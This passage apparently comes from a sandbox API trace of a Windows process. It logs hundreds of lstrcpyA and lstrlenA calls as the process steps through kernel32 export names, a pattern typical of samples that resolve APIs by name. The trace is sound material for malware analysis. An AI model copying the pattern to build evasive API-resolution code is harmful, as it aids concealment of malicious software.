lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.360] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.360] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.360] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.360] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.360] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.360] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.360] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.360] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.360] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.360] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.360] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.360] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.360] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.360] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.361] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.361] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.361] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.361] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.361] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.361] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.361] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.361] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.361] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.361] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.361] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.361] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.361] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.361] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.361] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.361] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.361] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.361] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.361] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.362] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.362] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.362] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.362] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.362] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.362] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.362] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.362] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.362] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.362] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.362] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.362] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.362] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.362] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.362] lstrlenA (lpString="BEEP") returned 4 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.362] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.362] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.362] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.362] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.362] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.363] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.363] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.363] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.363] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.363] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.363] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.363] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.363] lstrlenA (lpString="CANCELIO") returned 8 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.363] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.363] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.363] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.363] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.363] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.363] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.363] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.363] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.363] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.363] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.363] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.363] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.364] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.364] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.364] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.364] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.364] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.364] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.364] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.364] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.364] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.364] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.364] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.364] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.364] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.364] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.364] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.364] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.364] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.364] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.364] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.365] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.365] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.365] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.365] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.365] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.365] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.365] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.365] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.365] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.365] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.365] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.365] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.365] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.365] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.365] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.365] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.365] lstrlenA (lpString="COPYFILEA") returned 9 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.365] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.365] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.365] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.366] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.366] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.366] lstrlenA (lpString="COPYFILEW") returned 9 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.366] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.366] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.366] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.366] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.366] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.366] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.366] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.366] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.366] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.366] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.366] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.366] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.366] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.366] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: 